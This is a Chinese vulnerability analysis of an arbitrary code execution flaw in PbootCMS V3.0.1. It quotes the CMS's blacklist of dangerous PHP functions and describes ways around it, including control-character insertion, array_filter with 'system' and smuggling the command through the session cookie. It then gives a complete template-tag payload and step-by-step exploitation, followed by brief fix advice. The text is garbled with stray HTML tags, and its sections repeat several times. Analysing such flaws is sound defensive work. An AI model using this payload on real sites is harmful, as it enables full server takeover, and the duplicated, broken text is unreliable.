PbootCMS V3.0.1 任意代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>
PbootCMS V3.0.1 版本存在一个任意代码执行漏洞，攻击者可以通过精心构造的模板标签实现远程代码执行。该漏洞源于模板解析过程中的过滤不严，结合PHP函数特性可实现绕过安全限制。<\/p>

漏洞背景<\/h2>
在PbootCMS 2.0.9版本的分析中，发现某些利用方法在Nginx环境下无法使用。为解决这个问题并寻找新版本可用的利用方法，对3.0.1版本进行了进一步分析。<\/p>

环境准备<\/h2>

下载源码：https:\/\/gitee.com\/hnaoyun\/PbootCMS (版本V3.0.1，更新时间为2020-07-09)<\/li>

安装后需要从https:\/\/www.pbootcms.com\/freesn\/获取授权码<\/li> <\/ol>

漏洞分析<\/h2>

关键代码位置<\/h3>
漏洞主要位于`apps\/home\/controller\/ParserController.php<\/code>文件中的parserIfLabel<\/code>方法。<\/p>`

安全过滤机制<\/h3>
系统有两处关键过滤：<\/p>

函数名过滤<\/strong>：<\/li>
<\/ol>
if<\/span> (preg_match_all<\/span>('\/([\w]+)(?:\s*)\(\/i'<\/span>, $matches[1<\/span>][$i], $matches2)) {
<\/span><\/span>    foreach<\/span> ($matches2[1<\/span>] as<\/span> $value) {
<\/span><\/span>        if<\/span> (function_exists<\/span>($value) &&<\/span> !<\/span>in_array<\/span>($value, $white_fun)) {
<\/span><\/span>            $danger =<\/span> true<\/span>;
<\/span><\/span>            break<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
黑名单过滤<\/strong>：<\/li>
<\/ol>
if<\/span> (preg_match<\/span>('\/(\$_GET\[)|(\$_POST\[)|(\$_REQUEST\[)|(\$_COOKIE\[)|(\$_SESSION\[)|(file_put_contents)|(file_get_contents)|(fwrite)|(phpinfo)|(base64)|(`)|(shell_exec)|(eval)|(assert)|(system)|(exec)|(passthru)|(pcntl_exec)|(popen)|(proc_open)|(print_r)|(print)|(urldecode)|(chr)|(include)|(request)|(__FILE__)|(__DIR__)|(copy)|(call_user_)|(preg_replace)|(array_map)|(array_reverse)|(getallheaders)|(get_headers)|(decode_string)|(htmlspecialchars)\/i'<\/span>, $matches[1<\/span>][$i]))
<\/span><\/span><\/code><\/pre>绕过方法<\/h3>


第一处过滤绕过<\/strong>：<\/p>

在函数名和括号之间插入控制字符来绕过校验<\/li>
<\/ul>
<\/li>

第二处过滤绕过<\/strong>：<\/p>

使用array_filter<\/code>函数实现代码执行，例如：array_filter(['whoami'],'system');<\/code><\/li>
绕过system<\/code>检测：将system<\/code>放到header头中，使用session_id(session_start())<\/code>方法获取session值<\/li>
<\/ul>
<\/li>

冒号替换绕过<\/strong>：<\/p>

系统会替换:<\/code>为@<\/code>符号<\/li>
使用反斜杠进行绕过：{pboot\:if}{\/pboot\:if}<\/code><\/li>
反斜杠会被写入数据库，在渲染时调用stripcslashes<\/code>函数删除反斜杠（位于core\/function\/handle.php<\/code>）<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h2>
利用步骤<\/h3>


登录后台<\/strong>，进入"站点信息"编辑页面<\/p>
<\/li>

插入恶意代码<\/strong>：<\/p>
<\/li>
<\/ol>
{pboot<\/span>:<\/span>if<\/span>}(array_filter<\/span>(array<\/span>(0<\/span>=><\/span>session_id<\/span>(session_start<\/span>())),'system'<\/span>)){\/<\/span>pboot<\/span>:<\/span>if<\/span>}
<\/span><\/span><\/code><\/pre>

访问前台首页<\/strong>，抓取数据包<\/p>
<\/li>

修改Cookie<\/strong>：<\/p>

将cookie中session的配置项改为system<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
完整Payload示例<\/h3>
{pboot\:if}(array_filter(array(0=>session_id(session_start())),'system')){\/pboot\:if}
<\/code><\/pre>
修复建议<\/h2>

严格过滤模板标签中的特殊字符<\/li>
加强函数调用检查，防止插入控制字符绕过<\/li>
更新到最新版本，官方可能已修复此漏洞<\/li>
限制后台模板编辑权限<\/li>
<\/ol>
总结<\/h2>
该漏洞通过精心构造的模板标签，结合PHP函数特性和系统处理机制，成功绕过多重安全过滤，最终实现任意代码执行。攻击者需要后台编辑权限才能利用此漏洞，但一旦成功利用可完全控制服务器。<\/p>

PbootCMS V3.0.1 任意代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2> PbootCMS V3.0.1 版本存在一个任意代码执行漏洞，攻击者可以通过精心构造的模板标签实现远程代码执行。该漏洞源于模板解析过程中的过滤不严，结合PHP函数特性可实现绕过安全限制。<\/p>

漏洞背景<\/h2> 在PbootCMS 2.0.9版本的分析中，发现某些利用方法在Nginx环境下无法使用。为解决这个问题并寻找新版本可用的利用方法，对3.0.1版本进行了进一步分析。<\/p>

漏洞分析<\/h2>

关键代码位置<\/h3> 漏洞主要位于apps\/home\/controller\/ParserController.php<\/code>文件中的parserIfLabel<\/code>方法。<\/p>

漏洞利用<\/h2>

总结<\/h2> 该漏洞通过精心构造的模板标签，结合PHP函数特性和系统处理机制，成功绕过多重安全过滤，最终实现任意代码执行。攻击者需要后台编辑权限才能利用此漏洞，但一旦成功利用可完全控制服务器。<\/p>

漏洞概述<\/h2>
PbootCMS V3.0.1 版本存在一个任意代码执行漏洞，攻击者可以通过精心构造的模板标签实现远程代码执行。该漏洞源于模板解析过程中的过滤不严，结合PHP函数特性可实现绕过安全限制。<\/p>

漏洞背景<\/h2>
在PbootCMS 2.0.9版本的分析中，发现某些利用方法在Nginx环境下无法使用。为解决这个问题并寻找新版本可用的利用方法，对3.0.1版本进行了进一步分析。<\/p>

关键代码位置<\/h3>
漏洞主要位于`apps\/home\/controller\/ParserController.php<\/code>文件中的parserIfLabel<\/code>方法。<\/p>`

总结<\/h2>
该漏洞通过精心构造的模板标签，结合PHP函数特性和系统处理机制，成功绕过多重安全过滤，最终实现任意代码执行。攻击者需要后台编辑权限才能利用此漏洞，但一旦成功利用可完全控制服务器。<\/p>